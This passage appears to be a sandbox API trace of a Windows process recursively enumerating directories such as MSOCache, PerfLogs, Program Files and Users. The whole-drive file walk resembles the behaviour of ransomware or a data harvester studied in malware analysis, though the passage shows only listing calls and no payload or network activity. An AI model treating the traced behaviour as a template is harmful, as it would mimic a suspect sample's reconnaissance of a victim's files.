nFileSizeLow=0x150578, dwReserved0=0x0, dwReserved1=0x0, cFileName="setup.exe", cAlternateFileName="")) returned 1 [0071.651] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.651] lstrlenW (lpString="setup.exe") returned 9 [0071.651] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7ca00570, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7ca00570, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa8c227b0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x412b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0071.651] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.651] lstrlenW (lpString="Setup.xml") returned 9 [0071.651] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xea) returned 0x1312ba0 [0071.651] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7ca00570, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7ca00570, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa8c227b0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x412b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0071.651] FindClose (in: hFindFile=0x6f5058 | out: hFindFile=0x6f5058) returned 1 [0071.652] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312620 | out: hHeap=0x6d0000) returned 1 [0071.652] FindNextFileW (in: hFindFile=0x6f5018, lpFindFileData=0x709030 | out: lpFindFileData=0x709030*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{91140000-0057-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~2")) returned 1 [0071.652] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.652] lstrlenW (lpString="{91140000-0057-0000-1000-0000000FF1CE}-C") returned 40 [0071.652] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x250) returned 0x1312620 [0071.652] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f5058 [0071.679] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.679] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.679] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe5ed9630, ftCreationTime.dwHighDateTime=0x1cb12b3, ftLastAccessTime.dwLowDateTime=0xe5ed9630, ftLastAccessTime.dwHighDateTime=0x1cb12b3, ftLastWriteTime.dwLowDateTime=0x4655d500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0071.679] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.679] lstrlenW (lpString="Office32WW.msi") returned 14 [0071.679] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x16771fb0, ftCreationTime.dwHighDateTime=0x1cb12b4, ftLastAccessTime.dwLowDateTime=0x16771fb0, ftLastAccessTime.dwHighDateTime=0x1cb12b4, ftLastWriteTime.dwLowDateTime=0x46536400, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x10b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32WW.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0071.679] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.679] lstrlenW (lpString="Office32WW.xml") returned 14 [0071.701] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf4) returned 0x1312c98 [0071.701] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec54b6b0, ftCreationTime.dwHighDateTime=0x1cb04a9, ftLastAccessTime.dwLowDateTime=0xec54b6b0, ftLastAccessTime.dwHighDateTime=0x1cb04a9, ftLastWriteTime.dwLowDateTime=0x4a687710, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2a968, dwReserved0=0x0, dwReserved1=0x0, cFileName="ose.exe", cAlternateFileName="")) returned 1 [0071.702] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.702] lstrlenW (lpString="ose.exe") returned 7 [0071.702] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xde72fbf0, ftCreationTime.dwHighDateTime=0x1cb0d0b, ftLastAccessTime.dwLowDateTime=0xde72fbf0, ftLastAccessTime.dwHighDateTime=0x1cb0d0b, ftLastWriteTime.dwLowDateTime=0x49c902c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x709768, dwReserved0=0x0, dwReserved1=0x0, cFileName="osetup.dll", cAlternateFileName="")) returned 1 [0071.702] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.702] lstrlenW (lpString="osetup.dll") returned 10 [0071.702] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9c380f0, ftCreationTime.dwHighDateTime=0x1cb12b3, ftLastAccessTime.dwLowDateTime=0xc9c380f0, ftLastAccessTime.dwHighDateTime=0x1cb12b3, ftLastWriteTime.dwLowDateTime=0x465d00f0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x228df5c, dwReserved0=0x0, dwReserved1=0x0, cFileName="OWOW32WW.cab", cAlternateFileName="")) returned 1 [0071.702] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.702] lstrlenW (lpString="OWOW32WW.cab") returned 12 [0071.702] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe7c66670, ftCreationTime.dwHighDateTime=0x1cb0ee5, ftLastAccessTime.dwLowDateTime=0xe7c66670, ftLastAccessTime.dwHighDateTime=0x1cb0ee5, ftLastWriteTime.dwLowDateTime=0x4a6ac100, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x165510, dwReserved0=0x0, dwReserved1=0x0, cFileName="PidGenX.dll", cAlternateFileName="")) returned 1 [0071.702] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.702] lstrlenW (lpString="PidGenX.dll") returned 11 [0071.702] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x95261510, ftCreationTime.dwHighDateTime=0x1cb048a, ftLastAccessTime.dwLowDateTime=0x95261510, ftLastAccessTime.dwHighDateTime=0x1cb048a, ftLastWriteTime.dwLowDateTime=0x4a6ac100, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0xaec3a, dwReserved0=0x0, dwReserved1=0x0, cFileName="pkeyconfig-office.xrm-ms", cAlternateFileName="PKEYCO~1.XRM")) returned 1 [0071.702] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.702] lstrlenW (lpString="pkeyconfig-office.xrm-ms") returned 24 [0071.702] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x108) returned 0x1312d98 [0071.702] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb7e7af0, ftCreationTime.dwHighDateTime=0x1cb04a9, ftLastAccessTime.dwLowDateTime=0xeb7e7af0, ftLastAccessTime.dwHighDateTime=0x1cb04a9, ftLastWriteTime.dwLowDateTime=0x49c691c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x150578, dwReserved0=0x0, dwReserved1=0x0, cFileName="setup.exe", cAlternateFileName="")) returned 1 [0071.702] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.702] lstrlenW (lpString="setup.exe") returned 9 [0071.702] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80aa51d0, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80aa51d0, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x4a6d3200, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x5061, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0071.703] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.703] lstrlenW (lpString="Setup.xml") returned 9 [0071.703] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xea) returned 0x70b9e8 [0071.703] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x749b0240, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x749b0240, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x46a46a30, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0xb9fa2f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="VisiorWW.cab", cAlternateFileName="")) returned 1 [0071.703] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.703] lstrlenW (lpString="VisiorWW.cab") returned 12 [0071.703] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80711960, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80711960, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x468ee660, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0xb80800, dwReserved0=0x0, dwReserved1=0x0, cFileName="VisiorWW.msi", cAlternateFileName="")) returned 1 [0071.703] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.703] lstrlenW (lpString="VisiorWW.msi") returned 12 [0071.703] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80b17dc0, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80b17dc0, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x468a2b70, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2213, dwReserved0=0x0, dwReserved1=0x0, cFileName="VisiorWW.xml", cAlternateFileName="")) returned 1 [0071.703] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.703] lstrlenW (lpString="VisiorWW.xml") returned 12 [0071.703] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x1312ea8 [0071.703] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80b17dc0, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80b17dc0, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x468a2b70, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2213, dwReserved0=0x0, dwReserved1=0x0, cFileName="VisiorWW.xml", cAlternateFileName="")) returned 0 [0071.703] FindClose (in: hFindFile=0x6f5058 | out: hFindFile=0x6f5058) returned 1 [0071.704] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312620 | out: hHeap=0x6d0000) returned 1 [0071.704] FindNextFileW (in: hFindFile=0x6f5018, lpFindFileData=0x709030 | out: lpFindFileData=0x709030*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{91140000-0057-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~2")) returned 0 [0071.704] FindClose (in: hFindFile=0x6f5018 | out: hFindFile=0x6f5018) returned 1 [0071.704] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709030 | out: hHeap=0x6d0000) returned 1 [0071.704] FindNextFileW (in: hFindFile=0x6f4fd8, lpFindFileData=0x707bc0 | out: lpFindFileData=0x707bc0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 0 [0071.704] FindClose (in: hFindFile=0x6f4fd8 | out: hFindFile=0x6f4fd8) returned 1 [0071.704] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x707bc0 | out: hHeap=0x6d0000) returned 1 [0071.704] FindNextFileW (in: hFindFile=0x6f5f18, lpFindFileData=0x6f5cc0 | out: lpFindFileData=0x6f5cc0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xaece4da0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x63006c, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0071.705] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.705] lstrlenW (lpString="pagefile.sys") returned 12 [0071.705] FindNextFileW (in: hFindFile=0x6f5f18, lpFindFileData=0x6f5cc0 | out: lpFindFileData=0x6f5cc0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x63006c, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0071.705] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.705] lstrlenW (lpString="PerfLogs") returned 8 [0071.705] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x250) returned 0x707bc0 [0071.705] FindFirstFileW (in: lpFileName="\\\\?\\C:\\PerfLogs\\*", lpFindFileData=0x707bc0 | out: lpFindFileData=0x707bc0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1312fa0 [0071.705] FindNextFileW (in: hFindFile=0x1312fa0, lpFindFileData=0x707bc0 | out: lpFindFileData=0x707bc0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.705] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.705] FindNextFileW (in: hFindFile=0x1312fa0, lpFindFileData=0x707bc0 | out: lpFindFileData=0x707bc0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Admin", cAlternateFileName="")) returned 1 [0071.705] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.705] lstrlenW (lpString="Admin") returned 5 [0071.705] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x250) returned 0x1312620 [0071.705] FindFirstFileW (in: lpFileName="\\\\?\\C:\\PerfLogs\\Admin\\*", lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70b890 [0071.706] FindNextFileW (in: hFindFile=0x70b890, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.706] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.706] FindNextFileW (in: hFindFile=0x70b890, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0071.706] FindClose (in: hFindFile=0x70b890 | out: hFindFile=0x70b890) returned 1 [0071.706] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312620 | out: hHeap=0x6d0000) returned 1 [0071.706] FindNextFileW (in: hFindFile=0x1312fa0, lpFindFileData=0x707bc0 | out: lpFindFileData=0x707bc0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Admin", cAlternateFileName="")) returned 0 [0071.706] FindClose (in: hFindFile=0x1312fa0 | out: hFindFile=0x1312fa0) returned 1 [0071.706] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x707bc0 | out: hHeap=0x6d0000) returned 1 [0071.706] FindNextFileW (in: hFindFile=0x6f5f18, lpFindFileData=0x6f5cc0 | out: lpFindFileData=0x6f5cc0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdf68fdc0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdf68fdc0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x63006c, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0071.706] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.706] lstrlenW (lpString="Program Files") returned 13 [0071.706] FindNextFileW (in: hFindFile=0x6f5f18, lpFindFileData=0x6f5cc0 | out: lpFindFileData=0x6f5cc0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x63006c, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0071.706] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.706] lstrlenW (lpString="Program Files (x86)") returned 19 [0071.706] FindNextFileW (in: hFindFile=0x6f5f18, lpFindFileData=0x6f5cc0 | out: lpFindFileData=0x6f5cc0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x63006c, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0071.706] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.707] lstrlenW (lpString="ProgramData") returned 11 [0071.707] FindNextFileW (in: hFindFile=0x6f5f18, lpFindFileData=0x6f5cc0 | out: lpFindFileData=0x6f5cc0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x63006c, cFileName="Recovery", cAlternateFileName="")) returned 1 [0071.707] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.707] lstrlenW (lpString="Recovery") returned 8 [0071.707] FindNextFileW (in: hFindFile=0x6f5f18, lpFindFileData=0x6f5cc0 | out: lpFindFileData=0x6f5cc0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xa1602bc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa1602bc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x63006c, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0071.707] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.707] lstrlenW (lpString="System Volume Information") returned 25 [0071.707] FindNextFileW (in: hFindFile=0x6f5f18, lpFindFileData=0x6f5cc0 | out: lpFindFileData=0x6f5cc0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x63006c, cFileName="Users", cAlternateFileName="")) returned 1 [0071.707] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.707] lstrlenW (lpString="Users") returned 5 [0071.707] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x250) returned 0x707bc0 [0071.707] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\*", lpFindFileData=0x707bc0 | out: lpFindFileData=0x707bc0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1312fa0 [0071.707] FindNextFileW (in: hFindFile=0x1312fa0, lpFindFileData=0x707bc0 | out: lpFindFileData=0x707bc0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, 